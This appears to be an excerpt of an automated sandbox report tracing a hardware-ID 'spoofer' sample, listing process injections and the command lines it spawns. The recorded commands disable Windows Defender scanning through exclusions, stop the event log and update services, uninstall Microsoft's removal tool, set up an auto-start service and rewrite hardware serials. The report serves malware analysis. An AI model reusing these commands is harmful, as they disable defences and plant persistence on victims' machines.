PID 4368 wrote to memory of 2192 N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe C:\Windows\System32\cmd.exe
PID 4368 wrote to memory of 2192 N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe C:\Windows\System32\cmd.exe
PID 2192 wrote to memory of 1948 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2192 wrote to memory of 1948 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2192 wrote to memory of 1948 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2192 wrote to memory of 3980 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
PID 2192 wrote to memory of 3980 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
PID 2192 wrote to memory of 2760 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
PID 2192 wrote to memory of 2760 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
PID 2192 wrote to memory of 2764 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Roaming\conhost_sft.exe
PID 2192 wrote to memory of 2764 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Roaming\conhost_sft.exe
PID 720 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
PID 720 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
PID 3980 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 3980 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 4536 wrote to memory of 3832 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\Volumeid64.exe
PID 4536 wrote to memory of 3832 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\Volumeid64.exe
PID 3980 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\Conhost.exe
PID 3980 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\Conhost.exe
PID 4388 wrote to memory of 3380 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 4388 wrote to memory of 3380 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 4388 wrote to memory of 3364 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\Volumeid64.exe
PID 4388 wrote to memory of 3364 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\Volumeid64.exe
PID 4388 wrote to memory of 636 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 4388 wrote to memory of 636 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 4388 wrote to memory of 2996 N/A C:\Windows\System32\Conhost.exe C:\Windows\System32\cmd.exe
PID 4388 wrote to memory of 2996 N/A C:\Windows\System32\Conhost.exe C:\Windows\System32\cmd.exe
PID 4388 wrote to memory of 1116 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 4388 wrote to memory of 1116 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 4388 wrote to memory of 380 N/A C:\Windows\System32\Conhost.exe C:\Windows\system32\cmd.exe
PID 4388 wrote to memory of 380 N/A C:\Windows\System32\Conhost.exe C:\Windows\system32\cmd.exe
PID 4388 wrote to memory of 996 N/A C:\Windows\System32\Conhost.exe C:\Windows\System32\Conhost.exe
PID 4388 wrote to memory of 996 N/A C:\Windows\System32\Conhost.exe C:\Windows\System32\Conhost.exe
PID 4388 wrote to memory of 2280 N/A C:\Windows\System32\Conhost.exe C:\Windows\system32\wusa.exe
PID 4388 wrote to memory of 2280 N/A C:\Windows\System32\Conhost.exe C:\Windows\system32\wusa.exe
PID 4388 wrote to memory of 1636 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 4388 wrote to memory of 1636 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 4388 wrote to memory of 1672 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
PID 4388 wrote to memory of 1672 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
PID 4388 wrote to memory of 3412 N/A C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe
PID 4388 wrote to memory of 3412 N/A C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe
PID 4388 wrote to memory of 4296 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
PID 4388 wrote to memory of 4296 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
PID 4388 wrote to memory of 4544 N/A C:\Windows\System32\Conhost.exe C:\Windows\System32\cmd.exe
PID 4388 wrote to memory of 4544 N/A C:\Windows\System32\Conhost.exe C:\Windows\System32\cmd.exe
PID 4388 wrote to memory of 1464 N/A C:\Windows\System32\Conhost.exe C:\Windows\system32\powercfg.exe
PID 4388 wrote to memory of 1464 N/A C:\Windows\System32\Conhost.exe C:\Windows\system32\powercfg.exe
PID 4388 wrote to memory of 5104 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 4388 wrote to memory of 5104 N/A C:\Windows\System32\Conhost.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 3980 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 3980 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe

"C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe

"C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAbQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAbQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZQB4ACMAPgA="

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

"C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe"

C:\Users\Admin\AppData\Roaming\conhost_sft.exe

"C:\Users\Admin\AppData\Roaming\conhost_sft.exe"

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: ZFB2-0U5Z

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: ZFB2-0U5Z

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 17975HP-TRGT32468AB

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 317985HP-TRGT31945DQ

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 717985HP-TRGT31945MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 617985HP-TRGT31945FU

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 417985HP-TRGT31945FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 517985HP-TRGT31945SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 817985HP-TRGT31945SG

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 217985HP-TRGT31945RV

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 518001HP-TRGT20151SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 318005HP-TRGT30900DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 718005HP-TRGT30900MST

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 618005HP-TRGT30900FU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 418001HP-TRGT20151FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 818001HP-TRGT20151SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 218001HP-TRGT20151RV

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 18001HP-TRGT20151AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 218021HP-TRGT19106RV

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 418021HP-TRGT19106FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 518021HP-TRGT19106SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 718021HP-TRGT19106MST

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 318021HP-TRGT19106DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 618021HP-TRGT19106FU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 818021HP-TRGT19106SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 18021HP-TRGT19106AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: MZCZ-INRS

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: MZCZ-INRS

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: CTKV-Z543

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: CTKV-Z543

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 3ZBA-R7ET

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 3ZBA-R7ET

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 9208-Z9JG

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 9208-Z9JG

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "driverupdate"

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "driverupdate"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 9U35-0TJ9

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 9U35-0TJ9

C:\ProgramData\VC_redist.x64.exe

C:\ProgramData\VC_redist.x64.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: ED8I-JG46

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: ED8I-JG46

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: HI6V-FLNM

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: HI6V-FLNM

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: 3MG1-LPM1

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: 3MG1-LPM1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 5OID-I6E4

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 5OID-I6E4

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: I75N-FRZC

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: I75N-FRZC

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: KO8Z-OEZ1

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: KO8Z-OEZ1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: ZDOC-BT66

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: ZDOC-BT66

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: NVKV-9KBJ

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: NVKV-9KBJ

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: N28T-B91O

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: N28T-B91O

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: KPPR-9I8R

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: KPPR-9I8R

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: RLKL-STNJ

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: RLKL-STNJ

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 4G61-O3S9

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 4G61-O3S9

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 4VA6-VHUD

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 4VA6-VHUD

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: C2EU-LHH0

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: C2EU-LHH0

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

